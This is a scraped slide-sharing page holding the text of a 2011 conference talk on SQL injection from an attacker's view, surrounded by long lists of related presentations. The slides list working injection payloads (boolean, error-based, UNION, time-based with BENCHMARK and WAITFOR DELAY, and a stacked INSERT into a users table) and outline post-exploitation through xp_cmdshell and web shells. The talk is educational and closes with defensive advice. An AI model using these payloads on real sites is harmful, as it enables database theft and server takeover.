Network Security Data Visualizationamiable_indian
 
Cross Domain Access Policy solution using Cross Origin Resource sharing
Cross Domain Access Policy solution using Cross Origin Resource sharingCross Domain Access Policy solution using Cross Origin Resource sharing
Cross Domain Access Policy solution using Cross Origin Resource sharingAnkit Garg
 
Enabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using VirtualizationEnabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using Virtualizationamiable_indian
 

Semelhante a It all starts with the ' (SQL injection from attacker's point of view) (20)

Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...
Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...
Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
 
Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms
 
4MMSR-3 web vulnerabilities-lecturer
4MMSR-3 web vulnerabilities-lecturer4MMSR-3 web vulnerabilities-lecturer
4MMSR-3 web vulnerabilities-lecturer
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
 
Top Security Threats for .NET Developers
Top Security Threats for .NET DevelopersTop Security Threats for .NET Developers
Top Security Threats for .NET Developers
 
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]
 
DNS Exfiltration Using sqlmap
DNS Exfiltration Using sqlmapDNS Exfiltration Using sqlmap
DNS Exfiltration Using sqlmap
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish file
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
QA Automation Extended Star
QA Automation Extended StarQA Automation Extended Star
QA Automation Extended Star
 
6.Resource Exhaustion
6.Resource Exhaustion6.Resource Exhaustion
6.Resource Exhaustion
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualization
 
HTML5 storage and communication - Zohar Arad
HTML5 storage and communication - Zohar AradHTML5 storage and communication - Zohar Arad
HTML5 storage and communication - Zohar Arad
 
Cross Domain Access Policy solution using Cross Origin Resource sharing
Cross Domain Access Policy solution using Cross Origin Resource sharingCross Domain Access Policy solution using Cross Origin Resource sharing
Cross Domain Access Policy solution using Cross Origin Resource sharing
 
Enabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using VirtualizationEnabling Worm and Malware Investigation Using Virtualization
Enabling Worm and Malware Investigation Using Virtualization
 

Mais de Miroslav Stampar

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"Miroslav Stampar
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Miroslav Stampar
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseMiroslav Stampar
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureMiroslav Stampar
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsMiroslav Stampar
 
Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksMiroslav Stampar
 

Mais de Miroslav Stampar (9)

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"
 
Blind WAF identification
Blind WAF identificationBlind WAF identification
Blind WAF identification
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic Denoise
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical Infrastructure
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the Bears
 
Non-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & TricksNon-Esoteric XSS Tips & Tricks
Non-Esoteric XSS Tips & Tricks
 

Último

Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024The Digital Insurer
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusZilliz
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 

Último (20)

Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 

It all starts with the ' (SQL injection from attacker's point of view)

  • 1. It all starts with the ' (SQL injection from attacker's point of view) Miroslav Štampar (dev@sqlmap.org)
  • 2. What is SQL injection? “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution” (source: msdn.microsoft.com) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 2
  • 3. What is SQL injection? (2)  In plain speak, SQL injection is (mostly) about the unauthorized DBMS data access  Just in special cases, it's about the data modification together with system takeover  “Hello World” vulnerable code example (PHP/MySQL):  $sql = "SELECT * FROM table_name WHERE id =  " . $_GET["id"];  $result = mysql_query($sql) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 3
  • 4. Well known cases  In period 2005 till 2007 Albert Gonzalez has stolen 130 million credit card numbers  June 2007 – Microsoft U.K. Website defaced  December 2009 – RockYou (32 million credentials stolen)  December 2009 – NASA  July 2010 – The Pirate Bay FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 4
  • 5. Well known cases (2)  February 2011 – HBGary (Anonymous)  March 2011 – MySQL  March & May 2011 – Comodo (certificate reseller)  June 2011 – Sony, PBS (@LulzSec)  August 2011 – Nokia  September 2011 – NetNames DNS records (Betfair, The Telegraph, The Register, The National Geographic, UPS, Vodafone...) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 5
  • 6. Attackers' motivation number of vulnerable sites collected x  time spent on each site = const. time spent on particular target /  motivation = const. (target = multiple (co)sites) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 6
  • 7. Attackers' profiles 1) Targeting easy targets, unfocused, fast pace, predictable behavior, blabbering, don't really care about the target (“script kiddies”) 2) Persistent, focused, slow motion, covert, silent, higher than average technical skills, highly motivated (money, extortion, fame) (“black hats”/“crackers”/”bad guys”) 3) For fun and knowledge, could warn you about the problem found, don't want to cause any damage (”gray hats”/”hackers”/”good guys”) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 7
  • 8. SQL injection techniques  Boolean/Blind – AND 1=1, slow, 1 bit per request, page differentiation based, low difference ratio represents True response, False otherwise (in most common cases)  Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of subquery result(s) inside DBMS error message  Union/Inband – UNION ALL SELECT NULL,...,  (<subquery>),NULL,NULL,..., fastest, in FULL variant whole table dump per request, in PARTIAL variant 1 query result per request FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 8
  • 9. SQL injection techniques (2)  Time-based – AND 1=IF(2>1,  BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,1 12))),0), slowest, 1 bit per request, delay represents True response, False otherwise  Stacked – ;INSERT INTO users VALUES (10,  'test', 'testpass'), affecting mainly Microsoft SQL and PostgreSQL platforms, required for data modification, system access (e.g. xp_cmdshell), UDF injection, there are also time and error-based variants for data retrieval  Other (DNS exfiltration, “Lateral”, Second order attacks, etc.) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 9
  • 10. Attacking phases  Most SQL injection attacks can be dissected into following phases: 1) Searching for a vulnerable parameter (aka. “Injection point”) 2) Fingerprinting backend DBMS (for usage of proper payloads – e.g. error-based) 3) Finding a fastest applicable technique (U>E>B>T=S) 4) Enumeration (retrieving data of interest – e.g. usernames and passwords) 5) Eventual post-exploatation (underlying OS access, data modification, web server takeover) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 10
  • 11. Attacking workflow (1)  Finding a potential target – underground forums (e.g. antichat.ru), IRC channels, Google (e.g. dorks), domain scanning (e.g. nmap ­p 80), SHODAN (specialized Computer Search Engine), “drive-by” (e.g. proxying of all casual everyday traffic), “hit-list”, etc.  Manual web-browser based GET/POST parameter tampering with “poisonous” SQL characters (e.g. appending character ' to the end of the original parameter value) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 11
  • 12. Attacking workflow (2)  In case of a contained DBMS error attacker immediately proceeds with the “proper” (DBMS dependent) error-based payloads   FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 12
  • 13. Attacking workflow (3)  Otherwise, following step is the usage of common boolean based payloads (e.g. AND  1=1­­%20, OR 1=1­­%20, etc.)   FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 13
  • 14. Attacking workflow (4)  Along the attacking line, proper SQL injection prefix/suffix combination has to be “guessed”  For example, different payloads are needed in cases: ”SELECT * WHERE id='.$_GET[“id”] and ”SELECT * WHERE id=('.$_GET[“id”]')”  Adds one more dimension to the problem (more combinations)  Most common prefixes are: <blank>, ', “, '), “)  Problem of suffix finding can be most often circumvented by the usage of generic comment form: ­­%20 FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 14
  • 15. Attacking workflow (5)  In case that boolean/blind injection worked, there is a great possibility for union/inband  Brute-force search for proper column number  ORDER BY fast column number finding technique  Looking if it's a partial or full inband case  Finding usable (presented) column FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 15
  • 16. Attacking workflow (6)  If everything fails attacker could proceed (high motivation required) with common time-based payloads and/or stacked queries  Most commonly, this happens in INSERT/UPDATE/DELETE SQL injection cases (and DBMS error messages are suppressed)  Common payloads are: AND  1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(97))),0), ;IF(2>1) WAITFOR DELAY '0:0:5', ;SELECT COUNT(*)  FROM GENERATE_SERIES(1,5000000), etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 16
  • 17. Attacking workflow (7)  Enumeration phase consists of retrieving (”stealing”) data of interest:  Database and table names  Table dumps (e.g. users, admin,...)  System stored usernames and password hashes  User privileges and roles  Highly DBMS dependent (system database and table names, common function names, etc.)  Usage of automated tools is highly preferable in boolean/blind and time-based techniques FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 17
  • 18. Attacking workflow (8)  Eventual post-exploitation is highly bounded by the applicable SQL injection technique(s) and current user privileges  Best/worst case scenario is the availability of stacked technique along with the “admin” privileges  UDF injection (e.g. functions for OS command execution), web shell (e.g. union/inband MySQL INTO OUTFILE), Metasploit payload upload and execution (e.g. stacked Microsoft SQL xp_cmdshell()), etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 18
  • 19. Process automation 1) Web Application Assessment Proxy (optional) – BURP, WebScarab 2) Automatic SQL injection detection and exploitation tool – sqlmap, Havij, sqlninja 3) Second order exploitation framework – Metasploit (optional) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 19
  • 20. Introducing sqlmap  “sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server(s)”  Unofficially, sqlmap is AIO (All-In-One) SQL injection tool  Over 10,000 repository updates and/or checkouts on a monthly basis  Part of most popular security distributions: Backtrack, Backbox, Web Security Dojo, OWASP Web Testing,... FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 20
  • 21. sqlmap capabilities  Fully supported backend DBMSes (and growing): MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB  Fully supported SQL injection techniques: Boolean/Blind, Error-based, Union/Inband (partial & full), Timed-based, Stacked  Enumeration of: database users, users' password hashes, users' privileges, users' roles, databases, tables and columns, etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 21
  • 22. sqlmap capabilities (2)  Automatic recognition and cracking of password hashes  Support for IDS/WAF evasion in form of “tampering” scripts  Web server file upload/download  Arbitrary OS command execution and retrieval of standard console output  Establishment of an out-of-band TCP/UDP connection between the attacker's machine and the database server (Metasploit, ICMPsh) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 22
  • 23. Closing words (for attackers)  Learn SQL more than "well" – “SQL injection is 100% SQL. The rest is injection”  Setup (virtual) vulnerable environment entirely by yourself – for gaining better mindset and possessing LEGAL assessment testing machine  Mimic with comprehension what other “attackers” do – including automated tools (e.g. sqlmap)  Research defensive mechanisms – for advanced comprehension of the topic FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 23
  • 24. Closing words (for defenders)  Use (only) prepared SQL statements (bullet- proof against SQL injection attacks)  Self-filtering procedures are prone to common “programmer's” mistakes (e.g. forgetting to hard type-cast the integer parameter value)  Turn-off error (DBMS) reports  Use least privileged run (non-admin “query” user)  Always expect worst scenario and setup accordingly (e.g. use GRANT/REVOKE mechanism accordingly) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 24
  • 25. Questions? FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 25